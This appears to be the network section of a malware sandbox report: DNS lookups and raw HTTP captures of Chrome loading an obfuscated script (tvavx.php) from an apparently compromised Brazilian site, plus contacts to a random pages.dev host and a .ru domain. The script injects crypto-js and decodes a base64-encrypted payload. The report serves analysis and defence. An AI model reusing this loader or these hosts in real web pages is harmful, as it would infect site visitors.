                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Aug 27, 2024 20:11:15.479280949 CEST1.1.1.1192.168.2.50x126cNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:15.479378939 CEST1.1.1.1192.168.2.50xe90cNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:15.479378939 CEST1.1.1.1192.168.2.50xe90cNo error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.944986105 CEST1.1.1.1192.168.2.50x5e30No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.945131063 CEST1.1.1.1192.168.2.50xfd81No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.945131063 CEST1.1.1.1192.168.2.50xfd81No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.565727949 CEST1.1.1.1192.168.2.50xfcbdNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.565727949 CEST1.1.1.1192.168.2.50xfcbdNo error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.707998037 CEST1.1.1.1192.168.2.50xdb78No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.707998037 CEST1.1.1.1192.168.2.50xdb78No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.708523989 CEST1.1.1.1192.168.2.50x5535No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.751219988 CEST1.1.1.1192.168.2.50xad5fNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.105A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.104A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.147A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.99A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.103A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759769917 CEST1.1.1.1192.168.2.50xb123No error (0)www.google.com108.177.122.106A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.759783983 CEST1.1.1.1192.168.2.50x967eNo error (0)www.google.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:19.918312073 CEST1.1.1.1192.168.2.50x5fcaNo error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:19.918312073 CEST1.1.1.1192.168.2.50x5fcaNo error (0)estampariaimagemeacao.com.br45.164.92.188A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:20.106950998 CEST1.1.1.1192.168.2.50x9e97No error (0)www.estampariaimagemeacao.com.brestampariaimagemeacao.com.brCNAME (Canonical name)IN (0x0001)false
                                                                Aug 27, 2024 20:11:23.785391092 CEST1.1.1.1192.168.2.50xe338No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:11:23.786963940 CEST1.1.1.1192.168.2.50x3bcfNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.47.111A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:23.786963940 CEST1.1.1.1192.168.2.50x3bcfNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.44.145A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.198117018 CEST1.1.1.1192.168.2.50x1b94No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.198190928 CEST1.1.1.1192.168.2.50xba7cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.198190928 CEST1.1.1.1192.168.2.50xba7cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.198853970 CEST1.1.1.1192.168.2.50x15a4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.198853970 CEST1.1.1.1192.168.2.50x15a4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.199304104 CEST1.1.1.1192.168.2.50x4da9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.393598080 CEST1.1.1.1192.168.2.50x2cd4No error (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.393613100 CEST1.1.1.1192.168.2.50x863aNo error (0)glansaolksnu.ru104.21.51.138A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.393613100 CEST1.1.1.1192.168.2.50x863aNo error (0)glansaolksnu.ru172.67.181.39A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.572891951 CEST1.1.1.1192.168.2.50x26e1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.572891951 CEST1.1.1.1192.168.2.50x26e1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.572937012 CEST1.1.1.1192.168.2.50x6ff9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.950750113 CEST1.1.1.1192.168.2.50x2030No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.44.145A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.950750113 CEST1.1.1.1192.168.2.50x2030No error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev172.66.47.111A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.956549883 CEST1.1.1.1192.168.2.50xa73dNo error (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.296940088 CEST1.1.1.1192.168.2.50xeaeNo error (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.299209118 CEST1.1.1.1192.168.2.50x8fefNo error (0)glansaolksnu.ru104.21.51.138A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.299209118 CEST1.1.1.1192.168.2.50x8fefNo error (0)glansaolksnu.ru172.67.181.39A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.423054934 CEST1.1.1.1192.168.2.50xa63No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.423054934 CEST1.1.1.1192.168.2.50xa63No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.423054934 CEST1.1.1.1192.168.2.50xa63No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.423054934 CEST1.1.1.1192.168.2.50xa63No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.294807911 CEST1.1.1.1192.168.2.50x2f16No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.294807911 CEST1.1.1.1192.168.2.50x2f16No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.294807911 CEST1.1.1.1192.168.2.50x2f16No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.294807911 CEST1.1.1.1192.168.2.50x2f16No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                • www.estampariaimagemeacao.com.br
                                                                • cdnjs.cloudflare.com
                                                                • fs.microsoft.com
                                                                • https:
                                                                  • ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                  • challenges.cloudflare.com
                                                                  • glansaolksnu.ru
                                                                  • code.jquery.com
                                                                • slscr.update.microsoft.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.54971545.164.92.1884436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:16 UTC685OUTGET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:16 UTC182INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:15 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/javascript
                                                                2024-08-27 18:11:16 UTC8010INData Raw: 33 65 33 66 0d 0a 76 61 72 20 69 73 73 75 65 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 69 73 73 75 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 69 73 73 75 65 29 3b 0d 0a 69 73 73 75 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22 65 79 4a 68 49 6a 6f 69 55 56 46 5a
                                                                Data Ascii: 3e3fvar issue= document.createElement("script");issue.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(issue);issue.onload=function(){var {a,b,c,d} = JSON.parse(atob("eyJhIjoiUVFZ
                                                                2024-08-27 18:11:16 UTC7931INData Raw: 4d 5a 6b 64 79 4e 6b 38 7a 61 47 74 7a 63 44 55 77 63 48 45 77 55 56 64 69 61 58 52 79 55 7a 68 36 65 57 4e 45 58 43 39 34 4f 54 59 31 62 6c 52 35 65 6c 52 70 53 6a 52 7a 64 6e 5a 46 52 6e 46 79 5a 6d 4e 70 62 57 46 46 62 58 70 74 56 45 4a 4d 5a 47 64 77 4d 6d 45 35 64 45 64 45 62 6e 42 42 52 7a 4a 7a 58 43 39 72 65 46 4a 45 62 46 77 76 56 32 56 35 56 31 64 4a 4f 57 6f 72 5a 30 78 52 65 54 4e 61 4f 57 6f 72 4e 55 4e 33 52 47 4e 5a 65 6c 4e 77 5a 7a 56 35 4e 55 39 42 4e 31 55 7a 4f 55 51 78 53 55 70 6f 63 45 5a 56 55 6b 30 77 65 56 5a 48 56 46 70 50 59 30 39 68 52 6e 4e 31 59 7a 4e 57 51 6a 6c 33 51 7a 68 43 5a 6d 46 63 4c 32 68 4a 52 31 63 7a 59 55 74 45 4d 31 42 59 4f 56 6c 61 57 57 30 79 5a 45 74 77 51 7a 52 59 5a 32 51 32 4d 6d 52 70 53 6e 42 6f 63 55
                                                                Data Ascii: MZkdyNk8zaGtzcDUwcHEwUVdiaXRyUzh6eWNEXC94OTY1blR5elRpSjRzdnZFRnFyZmNpbWFFbXptVEJMZGdwMmE5dEdEbnBBRzJzXC9reFJEbFwvV2V5V1dJOWorZ0xReTNaOWorNUN3RGNZelNwZzV5NU9BN1UzOUQxSUpocEZVUk0weVZHVFpPY09hRnN1YzNWQjl3QzhCZmFcL2hJR1czYUtEM1BYOVlaWW0yZEtwQzRYZ2Q2MmRpSnBocU
                                                                2024-08-27 18:11:16 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:11:16 UTC8192INData Raw: 31 66 34 30 0d 0a 55 77 5a 31 56 56 56 55 6c 45 61 58 45 79 57 48 59 78 65 6d 74 51 4f 54 64 4f 4e 47 5a 6b 4d 6e 4e 79 54 45 56 57 4e 56 4e 5a 63 6d 70 72 5a 6d 31 33 51 6c 64 70 52 6c 4e 48 4e 48 5a 79 52 32 70 68 63 58 6f 34 59 6a 4a 42 59 57 74 7a 55 47 39 4f 55 47 39 36 56 48 49 35 53 31 68 5a 5a 6c 41 30 51 33 64 78 52 6b 31 4c 55 30 74 4d 61 55 74 63 4c 32 5a 43 55 6a 68 6c 5a 7a 64 50 59 6d 67 35 55 6a 55 78 53 6e 46 6d 52 54 46 5a 59 32 4e 4c 4d 31 68 79 52 7a 46 57 63 32 64 78 57 58 46 50 5a 6e 51 77 61 58 51 33 62 47 70 7a 56 33 68 59 54 45 51 79 55 47 5a 4f 53 6b 4d 32 61 55 46 36 64 31 45 33 53 6a 42 32 51 55 68 70 56 79 74 6f 55 58 6b 33 52 45 30 79 64 6c 77 76 64 46 46 55 61 7a 68 45 55 47 6b 32 51 6a 6c 33 54 6e 64 6c 4e 44 46 5a 65 45 30
                                                                Data Ascii: 1f40UwZ1VVVUlEaXEyWHYxemtQOTdONGZkMnNyTEVWNVNZcmprZm13QldpRlNHNHZyR2phcXo4YjJBYWtzUG9OUG96VHI5S1hZZlA0Q3dxRk1LU0tMaUtcL2ZCUjhlZzdPYmg5UjUxSnFmRTFZY2NLM1hyRzFWc2dxWXFPZnQwaXQ3bGpzV3hYTEQyUGZOSkM2aUF6d1E3SjB2QUhpVytoUXk3RE0ydlwvdFFUazhEUGk2Qjl3TndlNDFZeE0
                                                                2024-08-27 18:11:16 UTC7822INData Raw: 52 6a 64 49 56 31 77 76 52 55 46 4a 4e 44 52 69 63 32 6f 34 56 6c 4e 4c 63 45 31 4b 52 57 31 53 59 6b 68 4c 63 55 5a 68 53 57 4e 58 4f 55 64 77 62 57 51 78 58 43 39 69 55 30 39 71 55 58 5a 6f 55 47 6c 31 4d 6b 70 36 59 33 51 32 55 45 39 73 61 6b 38 30 55 56 59 35 53 6a 64 77 55 58 46 63 4c 31 5a 51 54 47 46 6f 59 33 64 49 54 55 35 49 53 47 56 50 57 57 67 34 59 6b 78 78 63 57 39 4f 53 6c 68 4e 56 55 31 74 4e 6e 70 45 53 44 68 52 57 6d 4e 4e 62 32 78 75 4f 54 46 4c 61 54 5a 4a 4e 46 52 35 65 47 52 78 59 30 52 45 62 48 51 77 61 55 46 57 57 44 4a 4c 53 48 56 50 55 47 70 78 58 43 38 32 64 56 64 31 5a 32 34 33 65 58 6c 4b 56 44 52 44 58 43 39 47 56 6d 30 35 53 46 56 6a 5a 48 56 51 64 33 46 68 55 33 6c 72 4e 45 39 4c 57 58 45 33 52 6d 39 51 4d 6b 31 6c 4e 47 46
                                                                Data Ascii: RjdIV1wvRUFJNDRic2o4VlNLcE1KRW1SYkhLcUZhSWNXOUdwbWQxXC9iU09qUXZoUGl1Mkp6Y3Q2UE9sak80UVY5SjdwUXFcL1ZQTGFoY3dITU5ISGVPWWg4YkxxcW9OSlhNVU1tNnpESDhRWmNNb2xuOTFLaTZJNFR5eGRxY0REbHQwaUFWWDJLSHVPUGpxXC82dVd1Z243eXlKVDRDXC9GVm05SFVjZHVQd3FhU3lrNE9LWXE3Rm9QMk1lNGF
                                                                2024-08-27 18:11:16 UTC2INData Raw: 0d 0a
                                                                Data Ascii:
                                                                2024-08-27 18:11:16 UTC1385INData Raw: 35 36 32 0d 0a 68 68 51 6c 56 77 53 56 46 79 4f 54 68 4a 4e 54 68 43 59 6e 68 46 4e 32 39 52 56 6c 45 72 59 55 74 43 53 55 46 6b 51 6e 55 30 56 46 4a 69 51 31 77 76 59 30 68 63 4c 30 74 43 57 55 39 42 5a 44 49 78 64 58 42 56 53 57 46 68 56 6d 4e 68 64 33 4e 6f 65 6e 5a 69 61 33 6b 31 51 6d 4e 46 4e 47 4d 78 61 6e 45 72 52 32 74 48 5a 47 4d 72 62 58 63 72 61 46 45 77 51 54 6c 6f 57 48 63 34 52 55 39 31 53 45 49 33 4f 47 46 57 4b 31 6c 68 57 57 31 4e 65 45 4a 73 52 46 5a 52 4e 57 74 6e 61 32 74 69 53 45 77 72 52 46 64 78 63 58 4e 53 64 57 31 4b 5a 48 6f 7a 54 58 42 4c 61 57 74 32 54 57 39 63 4c 7a 68 70 55 32 73 34 57 6d 35 68 5a 58 68 56 53 31 52 6b 61 31 70 5a 51 56 46 6b 61 45 46 5a 61 54 68 6f 56 6d 31 4d 63 7a 4e 52 56 7a 68 6d 5a 6d 46 52 62 46 52 72
                                                                Data Ascii: 562hhQlVwSVFyOThJNThCYnhFN29RVlErYUtCSUFkQnU0VFJiQ1wvY0hcL0tCWU9BZDIxdXBVSWFhVmNhd3NoenZia3k1QmNFNGMxanErR2tHZGMrbXcraFEwQTloWHc4RU91SEI3OGFWK1lhWW1NeEJsRFZRNWtna2tiSEwrRFdxcXNSdW1KZHozTXBLaWt2TW9cLzhpU2s4Wm5hZXhVS1Rka1pZQVFkaEFZaThoVm1MczNRVzhmZmFRbFRr
                                                                2024-08-27 18:11:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549716104.17.25.144436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:17 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:17 UTC954INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:17 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425778
                                                                Expires: Sun, 17 Aug 2025 18:11:17 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tS5mrvRAMB9FCS%2Bl6UMHsIk4mWM5axHSsxhrQ0XjsncDpOYW1xISO7qNuI7w0Y7vrMrBwptJsiG54dfGdjnZS80gh87u2pBa1oZ9pWhUKoYuCNemEp67LtodOhb17p2u2eilHaOo"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e05f25ac578d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:17 UTC415INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65
                                                                Data Ascii: ow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.ge
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                Data Ascii: ;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function()
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f
                                                                Data Ascii: his._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlo
                                                                2024-08-27 18:11:17 UTC1369INData Raw: 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c
